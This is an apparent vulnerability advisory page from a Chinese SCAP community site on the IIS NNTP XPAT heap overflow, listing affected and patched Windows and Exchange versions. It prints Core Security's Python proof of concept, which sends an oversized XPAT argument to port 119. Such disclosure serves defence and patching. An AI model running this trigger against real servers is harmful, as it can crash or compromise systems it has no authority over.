- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.0 SP2
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.0
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0

- 漏洞讨论

The Microsoft Network News Transfer Protocol (NNTP) Component is prone to a buffer overflow condition. Successful exploitation of this vulnerability could allow remote code execution in the context of the process accessing the vulnerable component.

- 漏洞利用

Core Security Technologies has developed a private exploit for this vulnerability, however, it is not known to be circulating in the wild.

Core Security Technologies has released a proof-of-concept for this vulnerability:

#--
# IIS NNTP Service XPAT command heap overflow proof of concept
#
# Author:
# Lucas Lavarello (lucas at coresecurity dot com)
# Juliano Rizzo (juliano at coresecurity dot com)
#
# Copyright (c) 2001-2004 CORE Security Technologies, CORE SDI Inc.
# All rights reserved.
#
# THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI Inc. BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR
# CONSEQUENTIAL DAMAGES RESULTING FROM THE USE OR MISUSE OF
# THIS SOFTWARE
#
# http://www.coresecurity.com
#--

from socket import *

host = "127.0.0.1"
pat = "C"*1946 + " " + "X"*10

newsgroup = "control.newgroup"

sock = socket(AF_INET, SOCK_STREAM)
sock.connect((host, 119))

print sock.recv(512)

sock.send("group %s\x0d\x0a" % newsgroup)

print sock.recv(512)

sock.send("xpat From 1-9 %s \x0d\x0a" % pat)

- 解决方案

Microsoft has released a bulletin that includes fixes to address this issue for supported versions of the operating system.


Microsoft Windows Server 2003 Datacenter Edition

Microsoft Windows 2000 Advanced Server SP4

Microsoft Windows NT Server 4.0 SP6a

Microsoft Windows Server 2003 Enterprise Edition

Microsoft Windows 2000 Datacenter Server SP4

Microsoft Windows Server 2003 Web Edition

Microsoft Windows 2000 Advanced Server SP3

Microsoft Windows Server 2003 Enterprise Edition Itanium 0

Microsoft Windows 2000 Datacenter Server SP3

Microsoft Windows 2000 Server SP3

Microsoft Windows Server 2003 Standard Edition

Microsoft Windows NT Enterprise Server 4.0 SP6a

Microsoft Windows 2000 Server SP4

Microsoft Windows Server 2003 Datacenter Edition Itanium 0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站